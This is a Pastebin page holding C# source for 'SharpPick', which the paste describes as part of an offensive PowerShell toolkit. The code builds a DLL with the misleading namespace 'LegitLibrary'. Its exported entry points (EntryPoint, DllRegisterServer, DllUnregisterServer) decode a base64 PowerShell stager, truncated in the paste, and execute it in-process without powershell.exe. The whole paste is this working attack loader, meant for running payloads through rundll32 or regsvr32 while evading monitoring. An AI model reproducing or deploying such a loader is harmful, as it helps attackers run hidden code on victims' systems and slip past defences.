API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Jul 26th, 2017
76
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.79 KB | None | 0 0
raw download clone embed print report
  1. /*
  2. * SharpPick aka InexorablePoSH
  3. * Description: Application to load and run powershell code via the .NET assemblies
  4. * License: 3-Clause BSD License. See Veil PowerTools Project
  5. *
  6. * This application is part of Veil PowerTools, a collection of offensive PowerShell
  7. * capabilities. Hope they help!
  8. *
  9. * This is part of a sub-repo of PowerPick, a toolkit used to run PowerShell code without the use of Powershell.exe
  10. */
  11.  
  12. using System;
  13. using System.IO;
  14. using System.Resources;
  15. using System.Collections.Generic;
  16. using System.Linq;
  17. using System.Text;
  18. using System.Net;
  19.  
  20. //Adding libraries for powershell stuff
  21. using System.Collections.ObjectModel;
  22. using System.Management.Automation;
  23. using System.Management.Automation.Runspaces;
  24.  
  25. using System.Diagnostics;
  26. using System.Reflection;
  27. using System.Runtime.InteropServices;
  28. using RGiesecke.DllExport;
  29.  
  30.  
  31.  
  32. namespace LegitLibrary
  33. {
  34. public class Program
  35. {
  36. public static string RunPS(string cmd)
  37. {
  38. //Init stuff
  39. Runspace runspace = RunspaceFactory.CreateRunspace();
  40. runspace.Open();
  41. RunspaceInvoke scriptInvoker = new RunspaceInvoke(runspace);
  42. Pipeline pipeline = runspace.CreatePipeline();
  43.  
  44. //Add commands
  45. pipeline.Commands.AddScript(cmd);
  46.  
  47. //Prep PS for string output and invoke
  48. pipeline.Commands.Add("Out-String");
  49. Collection<PSObject> results = pipeline.Invoke();
  50. runspace.Close();
  51.  
  52. //Convert records to strings
  53. StringBuilder stringBuilder = new StringBuilder();
  54. foreach (PSObject obj in results)
  55. {
  56. stringBuilder.Append(obj);
  57. }
  58. return stringBuilder.ToString().Trim();
  59. }
  60. }
  61.  
  62. public class Service
  63. {
  64. public static void Exec()
  65. //static int Main(string[] args)
  66. {
  67. string stager = "WwBSAEUARgBdAC4AQQBTAFM...[SNIP]";
  68. var decodedScript = Encoding.Unicode.GetString(Convert.FromBase64String(stager));
  69.  
  70. //We should now have the script variable filled... double check before executing
  71. string results = Program.RunPS(decodedScript);
  72. }
  73. }
  74.  
  75. class Exports
  76. {
  77. [DllExport("EntryPoint", CallingConvention = CallingConvention.StdCall)]
  78. public static void EntryPoint(IntPtr hwnd, IntPtr hinst, string lpszCmdLine, int nCmdShow)
  79. {
  80. Service.Exec();
  81. }
  82. [DllExport("DllRegisterServer", CallingConvention = CallingConvention.StdCall)]
  83. public static void DllRegisterServer()
  84. {
  85. Service.Exec();
  86. }
  87. [DllExport("DllUnregisterServer", CallingConvention = CallingConvention.StdCall)]
  88. public static void DllUnregisterServer()
  89. {
  90. Service.Exec();
  91. }
  92. }
  93. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!